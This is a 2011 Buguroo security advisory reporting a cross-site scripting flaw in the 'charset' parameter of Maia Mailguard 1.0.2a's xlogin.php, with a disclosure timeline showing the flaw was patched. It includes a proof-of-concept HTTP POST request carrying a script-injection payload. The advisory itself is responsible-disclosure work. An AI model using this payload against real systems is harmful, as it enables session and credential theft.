Maia Mailguard 1.0.2a Cross Site Scripting

`===================================  
BUGUROO SECURITY SYSTEMS ALERT  
- Advisory: http://buguroo.com/adv/Buguroo_ADV_2011-001.txt  
- Discovered on: March 29th, 2011  
- Discovered by: Mario Lopez (mlopez (at) buguroo (dot) com)  
- Severity: 5/10  
===================================  
  
1. VULNERABILITY  
----------------------------  
Maia Mailguard is affected by a XSS vulnerability in version 1.0.2a.  
  
2. BACKGROUND  
----------------------------  
Maia Mailguard is a web-based interface and management system based on the  
popular amavisd-new e-mail scanner and SpamAssassin. Written in Perl and  
PHP, Maia Mailguard gives end-users control over how their mail is processed  
by virus scanners and spam filters, while giving mail administrators the  
power to configure site-wide defaults and limits.  
  
3. DESCRIPTION  
----------------------------  
Any user has the ability to inject and execute arbitrary HTML and Javascript  
code into the application.  
  
The vulnerability exists due to failure in the "xlogin.php" script to  
properly sanitize user-supplied input in "charset" variable. Successful  
exploitation of this vulnerability could result in a compromise of the  
application, theft of cookie-based authentication credentials, disclosure or  
modification of sensitive data.  
  
4. PROOF OF CONCEPT  
----------------------------  
An attacker can use browser to exploit this vulnerability. Example PoC url  
is as follows:  
  
POST https://example.com/xlogin.php HTTP/1.1  
Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg,  
application/x-shockwave-flash, application/xaml+xml,  
application/vnd.ms-xpsdocument, application/x-ms-xbap,  
application/x-ms-application, */*  
Referer: https://example.com/login.php  
Accept-Language: es  
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0;  
.NET CLR 2.0.50727; .NET CLR 3.0.04506.30)  
Content-Type: application/x-www-form-urlencoded  
Host: example.com  
Content-Length: 63  
Connection: Keep-Alive  
Cache-Control: no-cache  
  
super=&charset="></style><script>alert(11700)</script>&username=user&pwd=pass&submit=+Login+  
  
5. BUSINESS IMPACT  
----------------------------  
A theft authentication admin credentials can damage the corporation image.  
  
6. SYSTEMS AFFECTED  
----------------------------  
Maia Mailguard v1.0.2a and prior (all).  
  
7. SOLUTION  
----------------------------  
Sanitize the inputs.  
  
8. REFERENCES  
----------------------------  
http://www.maiamailguard.com  
http://blog.buguroo.com  
  
9. CREDITS  
----------------------------  
This vulnerability has been discovered and reported by Mario Lopez Jimenez,  
Senior Security Analyst with Buguroo Offensive Security (mlopez (at) buguroo  
(dot) com).  
  
10. DISCLOSURE TIMELINE  
----------------------------  
2011-03-29: Vulnerability was identified  
2011-03-31: Vendor contacted  
2011-04-01: Response and correction started.  
2011-04-03: Update Available.  
2011-04-07: Buguroo publishes this security advisory.  
  
11. ABOUT BUGUROO  
----------------------------  
Buguroo is a Spanish offensive security company founded in 2007, exclusively  
dedicated to the development of IT security solutions by means of its own  
software factory, We are a 100% R+D company under continuous evolution and  
technological renovation, enabling us to stay at the vanguard of our sector  
and to offer a first class service world wile.  
  
12. DISCLAIMER  
----------------------------  
Buguroo Offensive Security, S.L. assumes no liability for the use of the  
information provided in this advisory. This advisory was released in an  
effort to help the I.T. community protect themselves against a potentially  
dangerous security hole. This advisory is not an attempt to solicit  
business.  
  
--   
Mario López Jiménez  
Buguroo Offensive Security  
www.buguroo.com  
`